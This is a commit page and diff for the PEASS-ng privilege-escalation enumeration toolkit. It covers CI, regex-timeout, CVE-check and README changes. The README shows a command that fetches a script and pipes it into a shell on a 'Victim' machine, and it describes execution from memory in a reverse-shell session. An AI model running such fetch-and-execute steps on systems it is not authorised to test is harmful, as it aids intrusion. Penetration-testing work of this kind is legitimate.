Update CI-master_tests.yml

Merge pull request #323 from ruppde/master
Update 1_system_information.sh
2025-12-12 15:49:51 -08:00 · 2022-12-21 15:32:55 +01:00 · 2022-12-20 14:26:25 +01:00 · 2022-12-20 14:25:26 +01:00 · 2022-12-20 13:46:59 +01:00 · 2022-11-21 15:17:28 +01:00
7 changed files with 44 additions and 15 deletions
--- a/.github/workflows/CI-master_tests.yml
+++ b/.github/workflows/CI-master_tests.yml
@@ -1,10 +1,6 @@
 name: CI-master_test

-on:
-  pull_request:
-    branches:
-      - master
-  
+on:  
  schedule:
    - cron: "5 4 * * SUN"

--- a/linPEAS/README.md
+++ b/linPEAS/README.md
@@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas

 ```bash
 # Local network
-sudo python -m SimpleHTTPServer 80 #Host
+sudo python -m http.server 80 #Host
 curl 10.10.10.10/linpeas.sh | sh #Victim

 # Without curl
@@ -47,6 +47,12 @@ chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```

+```bash
+# Execute from memory in Penelope session
+# From: https://github.com/brightio/penelope
+> run peass-ng
+```
+
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.

--- a/linPEAS/builder/linpeas_parts/1_system_information.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information.sh
@@ -25,7 +25,7 @@ echo ""
 print_2title "CVEs Check"

 #-- SY) CVE-2021-4034
-if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then 
+if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then 
    echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
    echo ""
 fi
--- a/parsers/README.md
+++ b/parsers/README.md
@@ -3,7 +3,7 @@
 These scripts allows you to transform the output of linpeas/macpeas/winpeas to JSON and then to PDF and HTML.

 ```python3
-python3 peass2json.py </path/to/executed_peass.out> </path/to/peass.json>
+python3 peas2json.py </path/to/executed_peass.out> </path/to/peass.json>
 python3 json2pdf.py </path/to/peass.json> </path/to/peass.pdf>
 python3 json2html.py </path/to/peass.json> </path/to/peass.html>
 ```
--- a/winPEAS/winPEASexe/winPEAS/App.config
+++ b/winPEAS/winPEASexe/winPEAS/App.config
@@ -3,4 +3,7 @@
    <startup useLegacyV2RuntimeActivationPolicy="true"> 
        
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/></startup>
+    <runtime>
+		<AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
+	</runtime>
 </configuration>
--- a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
@@ -154,15 +154,39 @@ namespace winPEAS.Checks
            try
            {
                Regex rgx;
-                if (caseinsensitive)
-                    rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
-                else
-                    rgx = new Regex(regex_str.Trim());
+                bool is_re_match = false;
+                try
+                {
+                    // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
+                    if (caseinsensitive)
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
+                        rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+                    }
+                    else
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
+                        rgx = new Regex(regex_str.Trim());
+                    }
+                }
+                catch (RegexMatchTimeoutException e)
+                {
+                    if (Checks.IsDebug)
+                    {
+                        Beaprint.GrayPrint($"The regex {regex_str} had a timeout (ReDoS avoided but regex unchecked in a file)");
+                    }
+                    return foundMatches;
+                }
+                
+                if (!is_re_match)
+                {
+                    return foundMatches;
+                }

                int cont = 0;
                foreach (Match match in rgx.Matches(text))
                {
-                    if (cont > 4) break;
+                    if (cont > 10) break;
                    
                    if (match.Value.Length < 400 && match.Value.Trim().Length > 2)
                        foundMatches.Add(match.Value);
@@ -349,7 +373,7 @@ namespace winPEAS.Checks
                                        timer.Stop();

                                        TimeSpan timeTaken = timer.Elapsed;
-                                        if (timeTaken.TotalMilliseconds > 1000)
+                                        if (timeTaken.TotalMilliseconds > 20000)
                                            Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
                                    }
                                }
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
@@ -105,7 +105,7 @@ namespace winPEAS.Helpers

            PrintLegend();
            Console.WriteLine();
-            LinkPrint("https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation", "You can find a Windows local PE Checklist here:");
+            Console.WriteLine(BLUE + " You can find a Windows local PE Checklist here: "+YELLOW+"https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation");
        }

        static void PrintLegend()
Author	SHA1	Message	Date
Carlos Polop	e29c9e88d5	Update CI-master_tests.yml	2022-12-21 15:32:55 +01:00
Carlos Polop	8b6ce759d0	Merge pull request #323 from ruppde/master Update 1_system_information.sh	2022-12-20 14:26:25 +01:00
Carlos Polop	116d842158	Merge pull request #326 from Riqky/master Update README.md to remove python2	2022-12-20 14:25:26 +01:00
Riqky	46033a7af0	Update README.md Update python webserver to python 3 command, since python 2 is EOL.	2022-12-20 13:46:59 +01:00
Arnim Rupp	0ab4a65bab	Update 1_system_information.sh Fix false positive, Ubuntu fixed it one day earlier: policykit-1 (0.105-20ubuntu0.18.04.6) bionic-security; urgency=medium * SECURITY UPDATE: Local Privilege Escalation in pkexec - debian/patches/CVE-2021-4034.patch: properly handle command-line arguments in src/programs/pkcheck.c, src/programs/pkexec.c. - CVE-2021-4034 -- Marc Deslauriers <email address hidden> Wed, 12 Jan 2022 07:34:00 -0500	2022-11-21 15:17:28 +01:00
Carlos Polop	27d954e03a	Update FileAnalysis.cs	2022-11-02 18:58:53 +00:00
Carlos Polop	9416b924cb	Update FileAnalysis.cs	2022-11-02 18:50:36 +00:00
Carlos Polop	6ec25656f2	Update FileAnalysis.cs	2022-11-02 18:42:29 +00:00
Carlos Polop	3039ce555d	Update FileAnalysis.cs	2022-11-02 18:37:11 +00:00
Carlos Polop	d382de1cb1	Merge pull request #319 from motikan2010/fix/small-typo Fix small typo in /parser/README.md	2022-11-02 18:28:08 +00:00
Carlos Polop	c62a8f8b54	Update App.config	2022-11-02 18:27:42 +00:00
Carlos Polop	a70b9773db	Update FileAnalysis.cs	2022-11-02 18:26:18 +00:00
Carlos Polop	7a19b0968f	Update README.md	2022-10-12 14:56:18 +02:00
Carlos Polop	ce002b9f33	Update README.md	2022-10-12 14:34:05 +02:00
motikan2010	1afac19979	Fix typo in /parser/README.md	2022-10-09 13:56:29 +09:00
Carlos Polop	219b1669c3	Update Beaprint.cs	2022-10-06 17:46:45 +02:00